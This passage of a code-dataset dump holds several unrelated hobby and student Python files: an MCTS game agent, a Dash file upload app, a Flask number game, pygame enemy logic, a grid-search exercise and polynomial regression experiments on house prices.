sqrt(sum(N)) / (1+N), but we add\n ## randomness at the root node, so function(P, N) becomes:\n ## ((1-epsilon) * P + epsilon * nu[action]) * sqrt(sum(N)) / (1+N), where sum(N) is the sum of N of the edges of currentNode\n\n sumN = 0\n\n for action, edge in currentNode.edges:\n sumN += edge.stats['N']\n\n maxQU = -1\n for idx, (action, edge) in enumerate(currentNode.edges):\n Q = edge.stats['Q']\n P = edge.stats['P']\n N = edge.stats['N']\n U = computeU(N, P, epsilon, nu, idx, sumN)\n if Q + U > maxQU:\n maxQU = Q + U\n bestEdge = edge\n\n # At the very beginning, the tree is a single node, ie. a single leaf, and we don't enter into\n # this loop. Therefore, in that case, currentNode keeps on being the root node, value, done\n # keep the values they have before the loop (ie. 0 and False), and breadcrumbs keeps on being empty\n state = GameState.from_id(currentNode.state_id, GRID_SHAPE)\n # YOUR CODE HERE: run the action corresponding to the best edge\n _, value, done = state.takeAction(bestEdge.action)\n\n ## YOUR CODE HERE: append the selected edge to breadcrumbs\n breadcrumbs.append(bestEdge)\n ## YOUR CODE HERE: the outNode of the selected edge\n currentNode = bestEdge.outNode\n\n return currentNode, value, done, breadcrumbs\n\n def expandLeaf(self, leaf, done):\n\n if self.debug:\n print('------EVALUATING LEAF------')\n\n if not done:\n\n state = GameState.from_id(leaf.state_id, GRID_SHAPE)\n current_proba_victory, action_scores, allowedActions = self.evaluate_action_scores_from_model(state)\n if self.debug:\n print('CURRENT PROBA VICTORY FOR %d: %f', state.currentPlayer, current_proba_victory)\n\n ## YOUR CODE HERE: for all the actions allowed in allowedActions:\n ## - execute the action, which leads to a new state 'newState'.\n ## If the node corresponding to 'newState' is not in nodes_dict, append it using the function self.addNode(node)\n ## Else fetch it from nodes_dict\n ## Then create the Edge linking leaf to that node, with prior = action_scores[action], and add it to leaf.edges\n ## (which is the list of the edges of leaf)\n\n for action in range(len(allowedActions)):\n if allowedActions[action]:\n newState = state.takeAction(action)[0]\n node = Node(newState)\n if node in self.nodes_dict:\n node = self.nodes_dict[node.state_id]\n else:\n self.addNode(node)\n\n leaf.edges.append((action, Edge(leaf, node, action_scores[action], action)))\n\n def evaluate_action_scores_from_model(self, state):\n # state.board has shape (6,7), so it can be considered as a 1-layer image of shape:\n # - either (1,6,7) if channel layer first\n # - or (6,7,1) if channel last as usually done with Keras\n # Plus Keras needs a batch of inputs => we add an additional encapsulating array\n # => resulting shape is (1,1,6,7)\n inputToModel = np.array([[state.get_board_for_neural_network()]], dtype=np.int8)\n\n ## YOUR CODE HERE: let self.model do its predictions\n preds = self.model.predict(inputToModel)\n # preds[0] is an array of shape (1,1): the input was a batch of 1 board, and the neural network\n # predicts one value per board, between -1 and 1 because of the tanh activation for this head\n current_proba_victory = preds[0][0, 0]\n # preds[1] is an array of shape (1,7): the input was a batch of 1 board, and the neural network\n # predicts 7 values per board (the values for each possible action - more precisely a linear value\n # before transformation to a percentage via the softmax)\n logits = preds[1][0]\n\n # Forbidden actions must receive a probability equal to 0, therefore we force the output of the\n # neural network to -100 for them (so that the softmax would transform them to 0)\n allowedActions = state.allowedActions()\n forbiddenActions = [not (isallowed) for isallowed in allowedActions]\n logits[forbiddenActions] = -100\n\n # SOFTMAX\n odds = np.exp(logits)\n action_scores = odds / np.sum(odds)\n\n return ((current_proba_victory, action_scores, allowedActions))\n\n def backFill(self, leaf, value, breadcrumbs):\n \"\"\"breadcrumbs contains the list of edges which led from the root node to the leaf.\n In this function, we iterate over that list, in oder to increment N (number of visits)\n of these edges, and also in order to update their W (total value of the next state)\n and their Q = W / N\n \"\"\"\n\n ## Warning: there is a tricky trap with W: we want to add value or -value, depending on the\n ## player of the edge.\n ## Explanation:\n ## Let's say that the player at the leaf is 'leafPlayer': 'value' contains the value of the\n ## leaf according to 'leafPlayer'\n ## => during the iteration over the edges contained into breadcrumbs:\n ## - if the player of edge.inNode is equal to 'leafPlayer': W = W + value\n ##\t\t- else: W = W - value\n\n if self.debug:\n print('------DOING BACKFILL------')\n\n leafPlayer = GameState.current_player_from_id(leaf.state_id)\n\n ## YOUR CODE HERE:\n ## for each edge of breadcrumbs:\n ## - N is equal to edge.stats['N']. Increment it.\n ## - W is equal to edge.stats['W']. Add value or -value, as per the warning above.\n ## You can get the player of edge.inNode with GameState.current_player_from_id(edge.inNode.state_id)\n ## - update edge.stats['Q'], as per the formula Q = W / N\n\n for edge in breadcrumbs:\n edge.stats['N'] += 1\n if leafPlayer == GameState.current_player_from_id(edge.inNode.state_id):\n edge.stats['W'] += value\n else:\n edge.stats['W'] -= value\n edge.stats['Q'] = edge.stats['W'] / edge.stats['N']\n\n def addNode(self, node):\n self.nodes_dict[node.state_id] = node\n","repo_name":"ZaChr0me/MLUI","sub_path":"PluginSource/python/MCTSAgent/MCTS.py","file_name":"MCTS.py","file_ext":"py","file_size_in_byte":10945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74134987345","text":"import base64\r\nimport os\r\nfrom urllib.parse import quote as urlquote\r\nimport sys\r\n\r\nfrom whoosh.index import create_in\r\nfrom whoosh.fields import Schema, TEXT, ID\r\n\r\nfrom whoosh.qparser import QueryParser\r\nfrom whoosh import scoring\r\nfrom whoosh.index import open_dir\r\n\r\nfrom flask import Flask, send_from_directory\r\nimport dash\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\nfrom dash.dependencies import Input, Output\r\n\r\n\r\nUPLOAD_DIRECTORY = os.getcwd()+\"//upload\"\r\n\r\nALLOWED_EXTENSIONS = {'txt', 'pdf', 'doc','docx'}\r\n\r\ndef allowed_file(filename):\r\n return '.' in filename and \\\r\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\r\n\r\nif not os.path.exists(UPLOAD_DIRECTORY):\r\n os.makedirs(UPLOAD_DIRECTORY)\r\n\r\n\r\n# Normally, Dash creates its own Flask server internally. By creating our own,\r\n# we can create a route for downloading files directly:\r\nserver = Flask(__name__)\r\napp = dash.Dash(server=server)\r\n\r\n\r\n@server.route(\"/download/\")\r\ndef download(path):\r\n \"\"\"Serve a file from the upload directory.\"\"\"\r\n return send_from_directory(UPLOAD_DIRECTORY, path, as_attachment=True)\r\n\r\n\r\napp.layout = html.Div(\r\n [\r\n html.H1(\"File Browser\"),\r\n html.H2(\"Upload\"),\r\n dcc.Upload(\r\n id=\"upload-data\",\r\n children=html.Div(\r\n [\"Drag and drop or click to select a file to upload.\"]\r\n ),\r\n style={\r\n \"width\": \"100%\",\r\n \"height\": \"60px\",\r\n \"lineHeight\": \"60px\",\r\n \"borderWidth\": \"1px\",\r\n \"borderStyle\": \"dashed\",\r\n \"borderRadius\": \"5px\",\r\n \"textAlign\": \"center\",\r\n \"margin\": \"10px\",\r\n },\r\n multiple=True,\r\n ),\r\n dcc.Input(id = \"input1\",type=\"text\", placeholder=\"enter a search term\"),\r\n html.Div(id=\"output\"),\r\n html.H2(\"File List\"),\r\n html.Ul(id=\"file-list\"),\r\n\r\n ],\r\n style={\"max-width\": \"500px\"},\r\n)\r\n\r\n\r\ndef save_file(name, content):\r\n \"\"\"Decode and store a file uploaded with Plotly Dash.\"\"\"\r\n data = content.encode(\"utf8\").split(b\";base64,\")[1]\r\n with open(os.path.join(UPLOAD_DIRECTORY, name), \"wb\") as fp:\r\n fp.write(base64.decodebytes(data))\r\n\r\ndef uploaded_files():\r\n \"\"\"List the files in the upload directory.\"\"\"\r\n files = []\r\n for filename in os.listdir(UPLOAD_DIRECTORY):\r\n path = os.path.join(UPLOAD_DIRECTORY, filename)\r\n if os.path.isfile(path):\r\n files.append(filename)\r\n return files\r\n\r\n\r\ndef file_download_link(filename):\r\n \"\"\"Create a Plotly Dash 'A' element that downloads a file from the app.\"\"\"\r\n location = \"/download/{}\".format(urlquote(filename))\r\n return html.A(filename, href=location)\r\n\r\n\r\ndef createSearchableData(root):\r\n schema = Schema(title=TEXT(stored=True),path=ID(stored=True),content=TEXT,textdata=TEXT(stored=True))\r\n if not os.path.exists(\"indexdir\"):\r\n os.mkdir(\"indexdir\")\r\n ix = create_in(\"indexdir\",schema)\r\n writer = ix.writer()\r\n filepaths = [os.path.join(root,i) for i in os.listdir(root)]\r\n for path in filepaths:\r\n fp = open(path,'r')\r\n print(path)\r\n text = fp.read()\r\n writer.add_document(title=path.split(\"\\\\\")[1], path=path,\\\r\n content=text,textdata=text)\r\n fp.close()\r\n writer.commit()\r\n\r\ndef create_index(root):\r\n createSearchableData(root)\r\n\r\ndef whoosh_search(root,topn,x):\r\n ix = open_dir(\"indexdir\")\r\n query_str = x\r\n topN =topn\r\n with ix.searcher(weighting=scoring.Frequency) as searcher:\r\n query = QueryParser(\"content\", ix.schema).parse(query_str)\r\n results = searcher.search(query,limit=topN)\r\n return(results)\r\n\r\n\r\n@app.callback(\r\n Output(\"file-list\", \"children\"),\r\n [Input(\"upload-data\", \"filename\"),Input(\"upload-data\", \"contents\")],\r\n)\r\ndef update_output(uploaded_filenames, uploaded_file_contents):\r\n \"\"\"Save uploaded files and regenerate the file list.\"\"\"\r\n\r\n if uploaded_filenames is not None and uploaded_file_contents is not None:\r\n for name, data in zip(uploaded_filenames, uploaded_file_contents):\r\n save_file(name, data)\r\n\r\n files = uploaded_files()\r\n if len(files) == 0:\r\n return [html.Li(\"No files yet!\")]\r\n else:\r\n return [html.Li(file_download_link(filename)) for filename in files]\r\n\r\n\r\n@app.callback(\r\n Output(\"output\", \"children\"),\r\n [Input(\"input1\", \"value\")],\r\n)\r\ndef show_text(input1):\r\n return u'Input 1 is {}'.format(input1)\r\n\r\nif __name__ == \"__main__\":\r\n app.run_server(debug=True, port=8888)","repo_name":"forsc/apprep_1","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28268654410","text":"from flask import Flask,render_template, request, redirect, url_for\n\napp = Flask(__name__)\n\nclass Numbers:\n def __init__(self, first, second, third):\n self.first = first\n self.second = second\n self.third = third\n\n@app.route('/start', methods=['GET','POST'])\ndef wait():\n if request.method == 'GET':\n return render_template('wait.html')\n else:\n my_numbers = Numbers(\n request.form.get('my_first'),\n request.form.get('my_second'),\n request.form.get('my_third'),\n )\n # この部分をNOじゃなくてwait上に同じ値が含まれていると言う警告を出す\n if my_numbers.first == my_numbers.second:\n return render_template('wait.html',change=1)\n elif my_numbers.second == my_numbers.third:\n return render_template('wait.html',change=1)\n elif my_numbers.first == my_numbers.third:\n return render_template('wait.html',change=1)\n else:\n return render_template('wait.html',change=2, numbers=my_numbers)\n\n\n@app.route('/play', methods=['GET'])\ndef play():\n if request.method == 'GET':\n return render_template('play.html')\n else:\n pass\n\n\n# @app.route('/judge')\n# def judge():\n# pass\n\n\n@app.errorhandler(404)\ndef page_not_found(error):\n return render_template('title.html'), 404\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"ginpoko/numeron_flask","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14912594509","text":"import random\nimport pygame\nfrom constantes import *\nfrom master_enemigo import Enemigo_master\nfrom auxiliar import *\n\nclass Enemigo_walker(Enemigo_master):\n '''\n Esta clase crea al enemigo que camina de derecha a izquierda e izquierda a derecha. Cambia de direccion al chocar con los limites de la pantalla.\n Al colisionar con una proyectil del player mueren\n '''\n def __init__(self,path_stay,col_stay,rows_stay,flip_stay,path_walk,col_walk,rows_walk,flip_walk,x,y,gravity,speed,frame_rate_ms,move_rate_ms,lives,score):\n super().__init__(gravity, frame_rate_ms, move_rate_ms,score)\n \n \n self.stay_r = Auxiliar.getSurfaceFromSpriteSheet(path_stay,col_stay,rows_stay,flip_stay)\n self.stay_l = Auxiliar.getSurfaceFromSpriteSheet(path_stay,col_stay,rows_stay)\n self.walk_r = Auxiliar.getSurfaceFromSpriteSheet(path_walk,col_walk,rows_walk,flip_walk)\n self.walk_l = Auxiliar.getSurfaceFromSpriteSheet(path_walk,col_walk,rows_walk)\n \n self.contador_colisiones = 0\n self.salir_pantalla = False\n self.speed = speed\n self.vidas = lives\n self.score = score\n \n self.animation = self.stay_l\n self.direction = DIRECTION_R\n self.image = self.animation[self.frame]\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n\n #rectangulo colision del personsaje\n self.collition_rect = pygame.Rect(x+(self.rect.width/2)-10,y,self.rect.width/2,30)\n #rectangulo de los pies\n self.ground_collition_rect = pygame.Rect(self.collition_rect)\n self.ground_collition_rect.height = GROUND_COLLIDE_H\n self.ground_collition_rect.y = y + self.rect.height - GROUND_COLLIDE_H\n #rectangulo de la cabeza\n self.head_collition_rect = pygame.Rect(x+(self.rect.width/2)-10,y,self.rect.width/2,GROUND_COLLIDE_H)\n\n #banderas\n self.eliminado = False\n #self.soltar_vida = False\n\n\n self.tiempo_transcurrido_animation = 0\n self.frame_rate_ms = frame_rate_ms \n self.tiempo_transcurrido_move = 0\n self.move_rate_ms = move_rate_ms\n\n def walk(self,borde_r,borde_l):\n if (self.is_fall == False):\n if self.direction == DIRECTION_R:\n self.move_x = +self.speed\n self.animation = self.walk_r\n self.move_x = self.speed\n else:\n self.move_x = -self.speed\n self.animation = self.walk_l\n self.move_x = -self.speed\n\n if not self.salir_pantalla:\n if(self.is_fall == False):\n if self.collition_rect.colliderect(borde_r):\n self.direction = DIRECTION_L\n self.contador_colisiones += 1\n elif self.collition_rect.colliderect(borde_l):\n self.direction = DIRECTION_R\n self.contador_colisiones += 1\n\n if self.contador_colisiones > 6:\n self.salir_pantalla = True\n if self.rect.x > 1200 or self.rect.x < -100:\n self.eliminado = True\n\n def update(self,delta_ms,plataform_list,bala,player,collition_r,collition_l):\n self.do_movement(delta_ms,plataform_list)\n self.do_animation(delta_ms)\n self.colision_bala(bala,delta_ms,player)\n self.colision_head(player)\n self.walk(collition_r,collition_l)\n self.herir_player(player,delta_ms)\n \n def draw(self,screen):\n self.image = self.animation[self.frame]\n screen.blit(self.image,self.rect)\n if(DEBUG):\n pygame.draw.rect(screen,color=(255,0 ,0),rect=self.collition_rect)\n pygame.draw.rect(screen,color=(255,255,0),rect=self.ground_collition_rect)\n pygame.draw.rect(screen,color=BLACK,rect=self.head_collition_rect)\n \n\n\n\n\n\n#--------------------------------------------------------------------------------------------------------------------------------\n\n\nclass Lista_walkers:\n def __init__(self,lista,metodo) -> None:\n self.metodo = metodo\n self.lista_general = lista\n self.lista_draw = [] # En esta lista se almacenan los enemigos spawneados\n self.tiempo_spawn = 5000\n self.tiempo_transcurrido = 0\n self.primera = True\n self.bandera_primero = True\n\n '''\n def crear_enemigos(self):\n return [() for i in range(self.cantidad)] #Genera una lista en una sola lista usando un for\n \n \n def recargar_enemigos(self,jefe):\n #if jefe.lista_draw:\n if len(self.lista_draw) < self.cantidad:\n self.crear_enemigos()\n '''\n \n def enemigo_spawn(self,delta_ms):\n '''Saca enemigos de la lista_general y los agrega a la lista_draw, para esto tiene en cuenta un parametro de tiempo.'''\n if self.primera:\n enemigo_nacido = self.lista_general.pop(0)# elimino el primer elemento de la lista, y los almaceno en enemigo nacido\n self.lista_draw.append(enemigo_nacido)\n self.primera = False\n self.tiempo_transcurrido += delta_ms\n if self.tiempo_transcurrido >= self.tiempo_spawn and self.lista_general:\n enemigo_nacido = self.lista_general.pop(0)# elimino el primer elemento de la lista, y los almaceno en enemigo nacido\n enemigo_nacido.direction = random.choice([DIRECTION_L,DIRECTION_R])\n self.lista_draw.append(enemigo_nacido)\n self.tiempo_transcurrido = 0\n\n def encontrar_colision(self):\n '''Comprueba la lista_draw, si encuentra que el atributo booleano \"eliminado\", de un objeto, se encuentra en True, procede a remover al mismo de la lista'''\n for enemigo in self.lista_draw:\n if enemigo.eliminado:\n self.lista_draw.remove(enemigo)\n\n def recargar(self):\n if not self.lista_general:#pregunto si la lista esta vacia\n self.lista_general = self.metodo()\n\n def update(self,bala,delta_ms,plataform_list,player,border_r,borde_l,jefe):\n '''\n if self.bandera_primero:\n self.crear_enemigo_dos()\n self.bandera_primero = False\n '''\n self.enemigo_spawn(delta_ms)\n self.encontrar_colision()\n self.recargar()\n for enemigo in self.lista_draw:\n enemigo.update(delta_ms,plataform_list,bala,player,border_r,borde_l)\n \n def draw(self,screen):\n for enemigo in self.lista_draw:\n enemigo.draw(screen)\n\n\nclass Lista_jefe:\n def __init__(self,cantidad,tiempo_spawn,enemigo) -> None:\n self.cantidad = cantidad\n self.lista_general = self.crear_enemigos(enemigo)# En esta lista se encuentran los enemigos no nacidos\n self.lista_draw = [] # En esta lista se almacenan los enemigos spawneados\n self.tiempo_spawn = tiempo_spawn\n self.tiempo_transcurrido = 0\n self.primera = True\n self.bandera_primero = True\n\n \n def crear_enemigos(self,enemigo):\n return [enemigo() for i in range(self.cantidad)] #Genera una lista en una sola lista usando un for\n\n def enemigo_spawn(self,delta_ms):\n '''Saca enemigos de la lista_general y los agrega a la lista_draw, para esto tiene en cuenta un parametro de tiempo.'''\n \n if self.primera:\n enemigo_nacido = self.lista_general.pop(0)# elimino el primer elemento de la lista, y los almaceno en enemigo nacido\n self.lista_draw.append(enemigo_nacido)\n self.primera = False\n self.tiempo_transcurrido += delta_ms\n if self.tiempo_transcurrido >= self.tiempo_spawn and self.lista_general:\n enemigo_nacido = self.lista_general.pop(0)# elimino el primer elemento de la lista, y los almaceno en enemigo nacido\n self.lista_draw.append(enemigo_nacido)\n self.tiempo_transcurrido = 0\n\n def encontrar_colision(self):\n '''Comprueba la lista_draw, si encuentra que el atributo booleano \"eliminado\", de un objeto, se encuentra en True, procede a remover al mismo de la lista'''\n for enemigo in self.lista_draw:\n if enemigo.eliminado:\n self.lista_draw.remove(enemigo)\n\n def update(self,bala,delta_ms,plataform_list,screen,player):\n self.enemigo_spawn(delta_ms)\n self.encontrar_colision()\n for enemigo in self.lista_draw:\n enemigo.update(delta_ms,plataform_list,bala,player)\n enemigo.draw(screen)\n","repo_name":"BermudezNahuel/Python","sub_path":"Juego/manager_walkers.py","file_name":"manager_walkers.py","file_ext":"py","file_size_in_byte":8459,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"38656694583","text":"from collections import deque\n\ndx = [0, 0, -1]\ndy = [1, -1, 0]\nfor tc in range(1,11):\n t = int(input()); n = 100\n ans = target_x = target_y = 0\n q=deque()\n graph = [list(map(int, input().split())) for _ in range(n)]\n visited = [[0] * 100 for _ in range(100)]\n # 2 찾기\n for i in range(100):\n if graph[n-1][i] == 2:\n target_x = n-1\n target_y = i\n visited[target_x][target_y]=1\n q.append([target_x, target_y])\n break\n\n while q:\n x, y = q.popleft()\n if x == 0:\n ans = y\n break\n for i in range(3):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < n and 0 <= ny < n and not visited[nx][ny] and graph[nx][ny] == 1:\n visited[nx][ny] = 1\n q.append([nx, ny])\n break\n print('#{} {}'.format(t, ans))","repo_name":"toki0411/Algorithm","sub_path":"SWEA/D4/1210. [S���W 문제해결 기본] 2일차 - Ladder1/[S/W 문제해결 기본] 2일차 - Ladder1.py","file_name":"[S/W 문제해결 기본] 2일차 - Ladder1.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23889649147","text":"\r\nclass objects:\r\n\t\r\n\tlogger = -1\r\n\tobject_list = []\r\n\r\n\tdef __init__(self,logger,result):\r\n\t\tself.logger = logger.global_log\r\n\t\tself.process_objects(result)\r\n\t\t\r\n\tdef process_objects(self,result):\r\n\t\tself.logger.info('Formatting objects')\r\n\t\tfor i, obj in enumerate(result.annotation_results[0].object_annotations):\r\n\t\t\tif(len(obj.entity.description)>0):\r\n\t\t\t\tappearance_list = self.all_appearances(obj.segment.start_time_offset,obj.frames,obj.confidence)\r\n\t\t\t\tself.all_objects(obj.entity.description,appearance_list)\r\n\r\n\tdef all_appearances(self,initial_time,all_frames,confidence):\r\n\t\tappearance_list = []\r\n\t\tprevious_milliseconds = self.milliseconds(initial_time)\r\n\t\tfor current_frame in all_frames:\r\n\t\t\tcurrent_milliseconds = self.milliseconds(current_frame.time_offset)\r\n\t\t\tappearance_dict = self.one_appearance(current_frame.normalized_bounding_box,\r\n\t\t\t\tprevious_milliseconds,current_milliseconds,confidence)\r\n\t\t\tappearance_list.append(appearance_dict)\r\n\t\t\tprevious_milliseconds = current_milliseconds\r\n\t\treturn appearance_list\r\n\r\n\tdef milliseconds(self,time):\r\n\t\tmilliseconds = str(round((time.seconds + time.nanos/1e9)*1000,4))\r\n\t\treturn milliseconds\r\n\r\n\tdef one_appearance(self,box,previous_milliseconds,current_milliseconds,confidence):\r\n\t\tappearance_dict = {}\r\n\t\tappearance_dict[\"left\"] = round(box.left,4)\r\n\t\tappearance_dict[\"top\"] = round(box.top,4)\r\n\t\tappearance_dict[\"right\"] = round(box.right,4)\r\n\t\tappearance_dict[\"bottom\"] = round(box.bottom,4)\r\n\t\tappearance_dict[\"start\"] = previous_milliseconds\r\n\t\tappearance_dict[\"end\"] = current_milliseconds\r\n\t\tappearance_dict[\"confidence\"] = round(confidence,4)\r\n\t\treturn appearance_dict\t\t\r\n\r\n\tdef all_objects(self,object_name,appearance_list):\r\n\t\texist = self.check_existence(object_name)\r\n\t\tif exist:\r\n\t\t\tself.already_on_list(object_name,appearance_list)\r\n\t\telse:\r\n\t\t\tself.new_on_list(object_name,appearance_list)\r\n\r\n\tdef check_existence(self,name):\r\n\t\texist = False\r\n\t\tfor element in self.object_list: \r\n\t\t\tif(element['object']==name):\r\n\t\t\t\texist = True\r\n\t\t\t\tbreak;\t\r\n\t\treturn exist\r\n\r\n\tdef already_on_list(self,name,appearance_list):\r\n\t\tfor element in self.object_list: \r\n\t\t\tif(element['object']==name):\r\n\t\t\t\telement['appearances'] += appearance_list\r\n\t\t\t\tbreak;\r\n\r\n\tdef new_on_list(self,name,appearance_list):\r\n\t\tobject_dict = {}\r\n\t\tobject_dict[\"object\"] = name\r\n\t\tobject_dict[\"appearances\"] = appearance_list\r\n\t\tself.object_list.append(object_dict)\r\n\r\n\tdef get_json(self):\r\n\t\treturn self.object_list","repo_name":"marioquiroa/syn-sls-image-recognition","sub_path":"syn-gcp-objects/libraries/objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71107365905","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 27 13:16:09 2015\n\n@author: nickbecker\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn import linear_model\n\ndtype_dict = {'bathrooms':float, 'waterfront':int, 'sqft_above':int, 'sqft_living15':float, 'grade':int, 'yr_renovated':int, 'price':float, 'bedrooms':float, 'zipcode':str, 'long':float, 'sqft_lot15':float, 'sqft_living':float, 'floors':str, 'condition':int, 'lat':float, 'date':str, 'sqft_basement':int, 'yr_built':int, 'id':str, 'sqft_lot':int, 'view':int}\nsales = pd.read_csv('/Users/nickbecker/Documents/Github/machine_learning_prediction/housing_prices_prediction/data/kc_house_data.csv', dtype=dtype_dict)\nsales = sales.sort(['sqft_living','price'])\n\n\ndef polynomial_dataframe(feature, degree):\n # Returns a data frame of a Series raised to powers up to degree\n poly_dataframe = pd.DataFrame()\n poly_dataframe['power_1'] = feature\n\n if degree > 1:\n # loop over the remaining degrees:\n for power in range(2, degree+1):\n name = 'power_' + str(power)\n poly_dataframe[name] = poly_dataframe['power_1'].apply(lambda x: x**power)\n \n return poly_dataframe\n\n\npoly1_data = polynomial_dataframe(sales['sqft_living'], 1)\npoly1_data['price'] = sales['price']\n\n\n## Regression using Sci-kit learn\n\n# fit a degree-1 model\nmodel_1 = linear_model.LinearRegression()\nmodel_1.fit(poly1_data['power_1'].reshape((len(poly1_data), 1)),\n poly1_data['price'])\nmodel_1.coef_\nmodel_1.intercept_\npredictions_1 = model_1.predict(poly1_data['power_1'].reshape((len(poly1_data), 1)))\n\n# plot the data with the model's predicted values\nplt.plot(poly1_data['power_1'],poly1_data['price'], '.',\npoly1_data['power_1'], predictions_1, '-')\n\n\n# fit a degree-2 model\npoly2_data = polynomial_dataframe(sales['sqft_living'], 2)\npoly2_data['price'] = sales['price']\nfeatures = ['power_1', 'power_2']\n\nmodel_2 = linear_model.LinearRegression()\nmodel_2.fit(poly2_data[features],\n poly2_data['price'])\nmodel_2.coef_\nmodel_2.intercept_\npredictions_2 = model_2.predict(poly2_data[features])\n\n# plot the data with the model's predicted values\nplt.plot(poly2_data['power_1'],poly2_data['price'], '.',\npoly2_data['power_1'], predictions_2, '-')\n\n\n\n# fit a degree-15 model\npoly15_data = polynomial_dataframe(sales['sqft_living'], 15)\npoly15_data['price'] = sales['price']\nfeatures = poly15_data.columns[:-1]\n\nmodel_15 = linear_model.LinearRegression()\nmodel_15.fit(poly15_data[features],\n poly15_data['price'])\nmodel_15.coef_\nmodel_15.intercept_\npredictions_15 = model_15.predict(poly15_data[features])\n\n# plot the data with the model's predicted values\nplt.plot(poly15_data['power_1'],poly15_data['price'], '.',\npoly15_data['power_1'], predictions_15, '-')\n\n\n\n\n\n### Fitting 15th degree polynomimal on 4 datasets\nkc_house_set_1 = pd.read_csv('/Users/nickbecker/Documents/Github/machine_learning_prediction/housing_prices_prediction/data/wk3_kc_house_set_1_data.csv', dtype=dtype_dict)\nkc_house_set_2 = pd.read_csv('/Users/nickbecker/Documents/Github/machine_learning_prediction/housing_prices_prediction/data/wk3_kc_house_set_2_data.csv', dtype=dtype_dict)\nkc_house_set_3 = pd.read_csv('/Users/nickbecker/Documents/Github/machine_learning_prediction/housing_prices_prediction/data/wk3_kc_house_set_3_data.csv', dtype=dtype_dict)\nkc_house_set_4 = pd.read_csv('/Users/nickbecker/Documents/Github/machine_learning_prediction/housing_prices_prediction/data/wk3_kc_house_set_4_data.csv', dtype=dtype_dict)\n\n\n\n# Set 1\nset1_poly15_data = polynomial_dataframe(kc_house_set_1['sqft_living'], 15)\nset1_poly15_data['price'] = sales['price']\nfeatures = set1_poly15_data.columns[:-1]\n\nset1_model_15 = linear_model.LinearRegression()\nset1_model_15.fit(set1_poly15_data[features],\n set1_poly15_data['price'])\nset1_model_15.coef_\nset1_model_15.intercept_\nset1_predictions_15 = set1_model_15.predict(set1_poly15_data[features])\n\n# plot the data with the model's predicted values\nplt.plot(set1_poly15_data['power_1'],set1_poly15_data['price'], '.',\nset1_poly15_data['power_1'], set1_predictions_15, '-')\n\n\n\n\n# Set 2\nset2_poly15_data = polynomial_dataframe(kc_house_set_2['sqft_living'], 15)\nset2_poly15_data['price'] = kc_house_set_2['price']\nfeatures = set2_poly15_data.columns[:-1]\n\nset2_model_15 = linear_model.LinearRegression()\nset2_model_15.fit(set2_poly15_data[features],\n set2_poly15_data['price'])\nset2_model_15.coef_\nset2_model_15.intercept_\nset2_predictions_15 = set2_model_15.predict(set2_poly15_data[features])\n\n# plot the data with the model's predicted values\nplt.plot(set2_poly15_data['power_1'],set2_poly15_data['price'], '.',\nset2_poly15_data['power_1'], set2_predictions_15, '-')\n\n\n\n\n# Set 3\nset3_poly15_data = polynomial_dataframe(kc_house_set_3['sqft_living'], 15)\nset3_poly15_data['price'] = kc_house_set_3['price']\nfeatures = set3_poly15_data.columns[:-1]\n\nset3_model_15 = linear_model.LinearRegression()\nset3_model_15.fit(set3_poly15_data[features],\n set3_poly15_data['price'])\nset3_model_15.coef_\nset3_model_15.intercept_\nset3_predictions_15 = set3_model_15.predict(set3_poly15_data[features])\n\n# plot the data with the model's predicted values\nplt.plot(set3_poly15_data['power_1'],set3_poly15_data['price'], '.',\nset3_poly15_data['power_1'], set3_predictions_15, '-')\n\n\n\n# Set 4\nset4_poly15_data = polynomial_dataframe(kc_house_set_4['sqft_living'], 15)\nset4_poly15_data['price'] = kc_house_set_4['price']\nfeatures = set4_poly15_data.columns[:-1]\n\nset4_model_15 = linear_model.LinearRegression()\nset4_model_15.fit(set4_poly15_data[features],\n set4_poly15_data['price'])\nset4_model_15.coef_\nset4_model_15.intercept_\nset4_predictions_15 = set4_model_15.predict(set4_poly15_data[features])\n\n# plot the data with the model's predicted values\nplt.plot(set4_poly15_data['power_1'],set4_poly15_data['price'], '.',\nset4_poly15_data['power_1'], set4_predictions_15, '-')\n\n\n\n\n### \n\nkc_house_train = pd.read_csv('/Users/nickbecker/Documents/Github/machine_learning_prediction/housing_prices_prediction/data/wk3_kc_house_train_data.csv', dtype=dtype_dict)\nkc_house_validation = pd.read_csv('/Users/nickbecker/Documents/Github/machine_learning_prediction/housing_prices_prediction/data/wk3_kc_house_valid_data.csv', dtype=dtype_dict)\nkc_house_test = pd.read_csv('/Users/nickbecker/Documents/Github/machine_learning_prediction/housing_prices_prediction/data/wk3_kc_house_test_data.csv', dtype=dtype_dict)\n\nbest_rss = 1e20 # initialize to a high value\nfor degree in range(1,16):\n poly_data_temp = polynomial_dataframe(kc_house_train['sqft_living'], degree)\n poly_data_temp['price'] = kc_house_train['price']\n \n features_temp = poly_data_temp.columns[:-1]\n \n model_temp = linear_model.LinearRegression()\n model_temp.fit(poly_data_temp[features_temp], poly_data_temp['price'])\n \n validation_temp = polynomial_dataframe(kc_house_validation['sqft_living'], degree)\n validation_temp['price'] = kc_house_validation['price']\n validation_predictions = model_temp.predict(validation_temp[features_temp])\n \n # compute validation RSS\n model_temp_ssr = sum((validation_predictions - validation_temp['price'])**2)\n \n if model_temp_ssr < best_rss:\n best_rss = model_temp_ssr \n best_model = \"Degree: \" + str(degree)\n 